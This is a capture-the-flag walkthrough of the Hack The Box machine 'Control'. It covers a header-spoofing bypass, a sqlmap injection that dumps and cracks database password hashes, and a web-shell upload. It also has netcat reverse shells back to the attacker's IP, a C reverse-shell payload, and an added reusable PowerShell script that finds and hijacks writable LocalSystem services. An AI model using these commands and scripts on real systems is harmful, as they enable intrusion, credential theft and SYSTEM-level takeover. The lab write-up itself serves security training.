Hackthebox – Control
As with any machine, Control starts with a port scan.
root@kalivm:~/Control# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.167
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 08:01 CEST
# Nmap 7.80 scan initiated Sun Mar 15 15:43:57 2020 as: nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.023s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 10.0
135/tcp   open  msrpc   Microsoft Windows RPC
3306/tcp  open  mysql?
49666/tcp open  msrpc   Microsoft Windows RPC
49667/tcp open  msrpc   Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=3/15%Time=5E6E4110%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.43'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,
SF:4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.43'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersionBindR
SF:eqTCP,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.43'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 537.85 seconds
The only interesting ports are 80 and 3306. The fingerprint on 3306 already tells me that my host is not allowed to connect to the MariaDB server, so that service would need both credentials and a permitted source address. I start by browsing through the website.
Fidelity… I thought this box was named Control, but OK, sure, let's go with this.
After clicking the admin link, I get an error stating that a certain header is required. X-Forwarded-For is the header reverse proxies add to pass along the original client IP, but it is just a request header, so any client can set it to whatever it likes. The application is using it as an access control, which means all I need is a source address it trusts.
Looking at the source of the main page shows an IP address, so I might as well try that as the header value.
Using Burp Suite as proxy, I set the scope to 10.10.10.167 and add a match-and-replace rule so that the header is added to every request my browser sends.
After pointing my browser at Burp as its proxy, I can browse the admin pages. These pages contain lots of fields and buttons, so I start messing around with them a bit.
After trying many of the options, only the search field returns an error, so I continue with that. Inspecting the traffic in Burp shows that a productName parameter is sent in the POST body, so I throw that into sqlmap.
root@kalivm:~/Control# sqlmap -u http://10.10.10.167/search_products.php --data productName=x --proxy=http://localhost:8080 -a
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org
----snip----
[09:04:08] [INFO] fetching database users
database management system users [6]:
[*] 'hector'@'localhost'
[*] 'manager'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'fidelity'
[*] 'root'@'localhost'
---snip---
[09:04:36] [INFO] cracked password 'l3tm3!n' for user 'manager'
database management system users password hashes:
[*] hector [1]:
    password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
    password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
    clear-text password: l3tm3!n
[*] root [1]:
    password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
---snip---
sqlmap is pointed through Burp as well, since the match-and-replace rule takes care of the mandatory X-Forwarded-For header on every request (sqlmap's own --headers option would do the same). It quickly determines that the parameter is injectable and, after some experimenting, I use the -a option to just dump everything it can.
Not only does it recover the password hashes for users manager (cracked: l3tm3!n) and hector (not cracked), the privilege dump also shows that the users have the FILE privilege. In MySQL/MariaDB that privilege allows SELECT ... INTO OUTFILE/DUMPFILE, i.e. writing arbitrary files on the database server (only restricted by secure_file_priv if that is set), and it is exactly what sqlmap's --file-write relies on. With the web server on the same host, a file dropped into the IIS webroot becomes a web shell. This might be my way in!
root@kalivm:~/Control# sqlmap -u http://10.10.10.167/search_products.php --data productName=x --proxy=http://localhost:8080 --file-write=/opt/wwwolf-php-webshell/webshell.php --file-dest=c:/inetpub/wwwroot/sedje.php --batch
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.3#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org
---snip---
do you want confirmation that the local file '/opt/wwwolf-php-webshell/webshell.php' has been successfully written on the back-end DBMS file system ('c:/inetpub/wwwroot/sedje.php')? [Y/n] Y
[09:30:44] [INFO] the local file '/opt/wwwolf-php-webshell/webshell.php' and the remote file 'c:/inetpub/wwwroot/sedje.php' have the same size (7205 B)
[09:30:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'
I first tried several other files, including the Nishang PowerShell reverse shell and the common php-reverse-shell that ships with Kali, but those got blocked shortly after being written, so some security tool (Defender, presumably) appeared to be active on the host. After several attempts, I was finally able to get this wwwolf PHP web shell onto disk!
Using this web shell, I create a new directory C:\temp and upload nc.exe into it.
root@kalivm:~/Control# rlwrap nc -nlvp 9000
Listening on 0.0.0.0 9000
Connection received on 10.10.10.167 49673
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\temp> whoami
nt authority\iusr
With nc.exe in place, I can spawn a reverse shell as iusr, the IIS anonymous-authentication account. Time to look around the system. After a lot of enumeration, I could not find any feasible way to escalate my privileges to another user. However, someone on Discord mentioned that I should look (again) at the hashes obtained from the SQL dump. That was when I realised I had never cracked Hector's password!
Both the root hash and Hector's hash go into CrackStation, but only Hector's returns a result (these are MySQL/MariaDB native hashes, SHA1 of SHA1 of the password, which fall quickly when the password is in a wordlist). If Hector reuses that password for his Windows account, I should be able to get a shell as Hector.
root@kalivm:~/Control# cat ~/exploit/powershell/getshell.ps1
# Credentials recovered from the MariaDB dump (hash cracked on CrackStation)
$username = 'Control\Hector'
$password = 'l33th4x0rhector'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword
# Invoke-Command -ComputerName goes over WinRM on the local host and runs the block as Hector
Invoke-Command -ComputerName 127.0.0.1 -Credential $credential -ScriptBlock {cmd /c powershell c:\temp\nc.exe 10.10.14.76 9003 -e powershell.exe}
This is where I combine my own approach for Hackthebox – Sniper with that of Ippsec. I write a simple PowerShell script holding the credentials and use Invoke-Command to run the netcat command as Hector. Invoke-Command -ComputerName talks to WinRM, which is listening on the local host even though its port never showed up in the external scan, so this lets me run a command as another user without an interactive logon.
PS C:\temp> iwr -uri http://10.10.14.76/powershell/getshell.ps1 -outfile sedje.ps1
PS C:\temp> ./sedje.ps1
Program 'nc.exe' failed to run: Access is deniedAt line:1 char:1
+ CategoryInfo : NotSpecified: (Program 'nc.exe...t line:1 char:1:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ PSComputerName : 127.0.0.1
That's weird: nc.exe cannot be executed because of a permission problem. The directory and the file were created by iusr, and apparently their ACLs do not give Hector's WinRM session access to them. After some googling on how to change permissions, I found something way more complex than the way it is done on Linux, but hey, it might be worth a try.
PS C:\temp> $Acl = Get-Acl "c:\temp\"
PS C:\temp> $Ar = New-Object system.security.accesscontrol.filesystemaccessrule("Everyone","FullControl","Allow")
PS C:\temp> $Acl.SetAccessRule($Ar)
PS C:\temp> Set-Acl "C:\temp" $acl
PS C:\temp> $Acl = Get-Acl "c:\temp\nc.exe"
PS C:\temp> $Acl.SetAccessRule($Ar)
PS C:\temp> Set-Acl "C:\temp\nc.exe" $acl
PS C:\temp> ./sedje.ps1
Changing the ACLs on C:\temp and nc.exe worked. Granting Everyone FullControl is the blunt instrument; an Allow ReadAndExecute entry for CONTROL\Hector alone would have done the job without handing every other user on the box a writable staging directory. Now I should have a shell as Hector.
root@kalivm:~/Control# rlwrap nc -nlvp 9003
Listening on 0.0.0.0 9003
Connection received on 10.10.10.167 49678
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Hector\Documents> whoami
control\hector
I do have a shell as Hector. So perhaps I can get the user flag now. But before doing so there is one thing I want to do.
PS C:\Users\Hector\Documents> del c:\temp\sedje.ps1
In order not to make it too easy for anyone else reading the temp directory, I remove the ps1 file containing Hector's username and password.
PS C:\Users\Hector\Documents> cd ..\desktop
PS C:\Users\Hector\desktop> dir
Directory: C:\Users\Hector\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/1/2019 12:33 PM 32 user.txt
PS C:\Users\Hector\desktop> type user.txt
d8782dd<NOFLAG>2c4b5ba77ef2d472b
And there is the flag! Time to obtain it and continue to privilege escalation.
Privilege escalation
During the first hours of privilege escalation, I did not find much of interest except for this piece of PowerShell history for Hector. I ran each of the commands but could still not find much useful in their results.
PS C:\Users\Hector\desktop> (Get-PSReadlineOption).HistorySavePath
C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\Users\Hector\desktop> type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
However, at some point I started discussing the box on Discord and someone told me to look into the services.
PS C:\temp> get-service
get-service : Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At line:1 char:1
+ get-service
+ ~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Get-Service], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand
PS C:\temp> sc.exe query
[SC] OpenSCManager FAILED 5:
Access is denied.
The normal ways of querying services do not work: Get-Service throws an InvalidOperationException and sc.exe query reports access denied, and both boil down to OpenSCManager failing. Listing all services requires the enumerate right on the service control manager itself, and that right has apparently been taken away from Hector (connecting to the SCM still works, as starting a service shows later). So there is no easy way of listing them all.
PS C:\Users\Hector\desktop> get-acl HKLM:\SYSTEM\CurrentControlSet\Services\* | format-list
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Data
Owner : NT AUTHORITY\SYSTEM
Group : NT AUTHORITY\SYSTEM
Access : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
NT AUTHORITY\SYSTEM Allow FullControl
CREATOR OWNER Allow FullControl
NT AUTHORITY\Authenticated Users Allow ReadKey
NT AUTHORITY\SYSTEM Allow FullControl
CONTROL\Hector Allow FullControl
BUILTIN\Administrators Allow FullControl
---snip---
After some research, I found that the registry is another place to enumerate services: every service has a key under HKLM:\SYSTEM\CurrentControlSet\Services, and the ACL output shows CONTROL\Hector with FullControl on those keys, which is what the PowerShell history was hinting at. Write access to a service key means being able to change the service's configuration, including the binary it runs. However, when I tried to stop some of the services, I got either an access denied or a service not found error. Perhaps I needed services that were not started yet.
PS C:\temp> $services = get-itemproperty -path "HKLM:\System\CurrentControlSet\Services\*" | Where-Object {$_.ObjectName -eq "LocalSystem" -and $_.Start -eq 3 } | Select-Object -Property PSChildName
PS C:\temp> foreach ($service in $services) { get-service -name $service.pschildname -erroraction 'silentlycontinue' | Where-Object {$_.Status -eq 'Stopped'} |Select-Object -Property Name }
Name
----
AppMgmt
ConsentUxUserSvc
DevicesFlowUserSvc
EFS
NetSetupSvc
NgcSvc
PimIndexMaintenanceSvc
PrintWorkflowUserSvc
RasAuto
RSoPProv
seclogon
SecurityHealthService
SensorService
UnistoreSvc
UserDataSvc
vds
WaaSMedicSvc
Some more research online led me to the queries above. Get-Service does work when given a single service name, because opening one service only needs connect rights on the SCM plus query rights on that service, which is why the loop succeeds where the plain enumeration failed. The result is a list of candidates: configured with Start 3 (manual), running as LocalSystem (so whatever binary the service points at runs as SYSTEM) and not (yet) started. Now all I need is an executable to run with it. Running netcat directly as the service binary will probably be blocked by Defender, or be killed as soon as the service start times out, since nc.exe cannot register itself as a service.
root@kalivm:~/Control# cat getnc.c
#include <stdlib.h>

/* Not a real service: it never talks to the service control manager. It just
   spawns cmd, which runs nc.exe with a reverse PowerShell shell to my box.
   system() blocks until nc exits, so the process stays alive while the shell
   is in use. */
int main(void)
{
    system("cmd /c c:\\temp\\nc.exe 10.10.14.76 9004 -e powershell");
    return 0;
}
root@kalivm:~/Control# x86_64-w64-mingw32-gcc -o getnc.exe getnc.c
So I cross-compile this simple executable, which starts cmd with a netcat connection back to my box.
PS C:\temp> iwr -uri http://10.10.14.76/windows/getnc.exe -outfile getnc.exe
I transfer the file from my kali box to the Windows target.
PS C:\temp> set-itemproperty -path "HKLM:\System\CurrentControlSet\Services\seclogon" -Name ImagePath -value "C:\temp\getnc.exe"
PS C:\temp> get-itemproperty -path "HKLM:\System\CurrentControlSet\Services\seclogon"
Description : @%SystemRoot%\system32\seclogon.dll,-7000
DisplayName : @%SystemRoot%\system32\seclogon.dll,-7001
ErrorControl : 1
FailureActions : {128, 81, 1, 0...}
ImagePath : C:\temp\getnc.exe
ObjectName : LocalSystem
RequiredPrivileges : {SeTcbPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeAssignPrimaryTokenPrivilege...}
Start : 3
Type : 32
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\seclogon
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
PSChildName : seclogon
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
From the list, I select the seclogon service (Secondary Logon) as a candidate and point its ImagePath at my payload. Before overwriting it, it is worth saving the original value and its registry value type, so the service can be put back afterwards.
PS C:\temp> sc.exe start seclogon
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
I start the service. The SCM reports error 1053 because my executable never reports a running status back to it, so after the timeout the start counts as failed. By then, however, the payload has already been launched as LocalSystem, so maybe I have got my SYSTEM shell now if all went well.
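As an added example, not code from the original write-up, here is the whole procedure as a reusable PowerShell script. It generalises the one-off queries above by checking each service key's ACL against the current user's token instead of eyeballing the Get-Acl output, and it restores the original ImagePath together with its value type after the start, which the one-off commands do not. The function names are mine; the payload path C:\temp\getnc.exe and the choice of seclogon are assumptions taken from this box.

```powershell
# Added example (my own illustration, not the original write-up's commands).
# Assumptions: run from the low-privileged shell (Hector here); payload path
# and service name are parameters, taken from this box only as defaults.

function Resolve-Sid {
    # Translate an ACE identity (NTAccount or SID) to its SID string; returns
    # $null for accounts that no longer resolve instead of throwing.
    param([System.Security.Principal.IdentityReference]$Identity)
    try { $Identity.Translate([System.Security.Principal.SecurityIdentifier]).Value }
    catch { $null }
}

function Get-HijackableService {
    # Candidate = runs as LocalSystem, Start=3 (manual), currently stopped, and
    # the service key grants the current user (or one of its groups) SetValue,
    # FullControl or a generic write right. Enumeration goes through the
    # registry because OpenSCManager with the enumerate right is denied on this
    # host; Get-Service by name still works since that needs only connect plus
    # per-service query rights. Only Allow ACEs are considered, so a Deny ACE
    # could still block the write: treat the output as a candidate list.
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    $writeMask = [int][System.Security.AccessControl.RegistryRights]::SetValue `
                 -bor 0x10000000 -bor 0x40000000   # GENERIC_ALL, GENERIC_WRITE

    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $key  = $_
        $prop = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $prop -or $prop.ObjectName -ne 'LocalSystem' -or $prop.Start -ne 3) { return }

        $svc = Get-Service -Name $key.PSChildName -ErrorAction SilentlyContinue
        if (-not $svc -or $svc.Status -ne 'Stopped') { return }

        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { return }
        $canWrite = $acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            (([int]$_.RegistryRights -band $writeMask) -ne 0) -and
            ((Resolve-Sid $_.IdentityReference) -in $sids)
        }
        if ($canWrite) {
            [pscustomobject]@{ Name = $key.PSChildName; ImagePath = $prop.ImagePath }
        }
    }
}

function Invoke-ImagePathHijack {
    # Point the service at the payload, start it, then restore the original
    # ImagePath with its original value kind (usually REG_EXPAND_SZ, which a
    # plain string write would silently break). Starting needs connect on the
    # SCM and SERVICE_START on the service. A payload that never calls
    # StartServiceCtrlDispatcher makes sc.exe report error 1053 after the SCM
    # timeout; the payload has already run as LocalSystem by then.
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$Payload
    )
    $keyPath = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    $key     = Get-Item -Path $keyPath
    $origRaw = $key.GetValue('ImagePath', $null,
                 [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames)
    $kind    = $key.GetValueKind('ImagePath')

    Set-ItemProperty -Path $keyPath -Name ImagePath -Value $Payload -Type String
    try {
        $null = & sc.exe start $Name      # blocks until the SCM gives up (1053)
    } finally {
        Set-ItemProperty -Path $keyPath -Name ImagePath -Value $origRaw -Type $kind
    }
    [pscustomobject]@{ Service = $Name; RestoredImagePath = $origRaw; Kind = $kind }
}

# Usage from the Hector shell (payload path assumed):
# Get-HijackableService | Format-Table Name, ImagePath
# Invoke-ImagePathHijack -Name seclogon -Payload 'C:\temp\getnc.exe'
```

Run Get-HijackableService first; on this box the list should include seclogon. Invoke-ImagePathHijack blocks while sc.exe waits for the service to report back, so have the netcat listener running before calling it.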
root@kalivm:~/Control# rlwrap nc -nlvp 9004
Listening on 0.0.0.0 9004
Connection received on 10.10.10.167 49703
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
nt authority\system
And it did! I’ve got a shell as SYSTEM user so I can now gain access to the root flag!
PS C:\Windows\system32> cd c:\users\administrator\desktop
PS C:\users\administrator\desktop> dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/1/2019 12:33 PM 32 root.txt
PS C:\users\administrator\desktop> type root.txt
8f8613f5<NOFLAG>36ef11def4cec1b1
And there it is! What a ride this was, and I learned a lot about the registry values!